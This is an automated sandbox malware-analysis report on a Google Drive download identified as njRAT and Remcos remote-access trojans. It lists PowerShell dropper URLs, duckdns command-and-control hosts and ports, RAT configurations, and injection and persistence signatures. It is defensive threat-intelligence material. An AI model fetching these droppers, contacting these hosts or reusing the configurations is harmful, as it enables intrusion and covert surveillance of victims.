njrat | hxxps://docs[.]google[.]com/uc?export=download&id=1uunh1qD0bx4U21JO0SnbmuakQ9Qz5yTa

Resubmissions

06/03/2024, 21:51

240306-1qkdasae39 1

06/03/2024, 21:31

240306-1c7xfaaa22 10

Analysis

max time kernel
498s
max time network
583s
platform
windows10-2004_x64
resource
win10v2004-20240226-es
resource tags

arch:x64arch:x86image:win10v2004-20240226-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
06/03/2024, 21:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://docs.google.com/uc?export=download&id=1uunh1qD0bx4U21JO0SnbmuakQ9Qz5yTa

Score

10^/10

njrat remcos amigo marzo 5 nyan cat rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.213.50.74/GREEN/RX/nuevadll.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

remcos

Botnet

MARZO 5

senderodedios.duckdns.org:8020

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WN0U0H
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

teo1978.duckdns.org:8090

Mutex

e36aa5bd55

Attributes

reg_key
e36aa5bd55
splitter
@!#&^%$

Extracted

Family

njrat

Version

0.7.3

Botnet

amigo

rverde.duckdns.org:1981

Mutex

RDWINDWOS.exe

Attributes

reg_key
RDWINDWOS.exe
splitter
15173669

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Executes dropped EXE 1 IoCs

pid	Process
2332	Libro Y Registro Radicado Nª43197.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2332 set thread context of 5916	2332	Libro Y Registro Radicado Nª43197.exe	153

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4260	schtasks.exe
3476	schtasks.exe
216	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	AppLaunch.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "3"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2984	msedge.exe
2984	msedge.exe
1824	msedge.exe
1824	msedge.exe
4764	identity_helper.exe
4764	identity_helper.exe
4376	msedge.exe
4376	msedge.exe
3696	msedge.exe
3696	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
4032	msedge.exe
4032	msedge.exe
5824	msedge.exe
5824	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	6116	7zG.exe
Token: 35	6116	7zG.exe
Token: SeSecurityPrivilege	6116	7zG.exe
Token: SeSecurityPrivilege	6116	7zG.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
6116	7zG.exe
5916	AppLaunch.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
1824	msedge.exe
5916	AppLaunch.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3696	msedge.exe
4032	msedge.exe
5824	msedge.exe
5916	AppLaunch.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1824 wrote to memory of 3148	1824	msedge.exe	87
PID 1824 wrote to memory of 3148	1824	msedge.exe	87
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2848	1824	msedge.exe	88
PID 1824 wrote to memory of 2984	1824	msedge.exe	89
PID 1824 wrote to memory of 2984	1824	msedge.exe	89
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90
PID 1824 wrote to memory of 1784	1824	msedge.exe	90

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://docs.google.com/uc?export=download&id=1uunh1qD0bx4U21JO0SnbmuakQ9Qz5yTa
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9ee846f8,0x7ffc9ee84708,0x7ffc9ee84718
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
  2⤵
  PID:2848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
  2⤵
  PID:1784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2768
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:2820
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:1864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1
  2⤵
  PID:844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
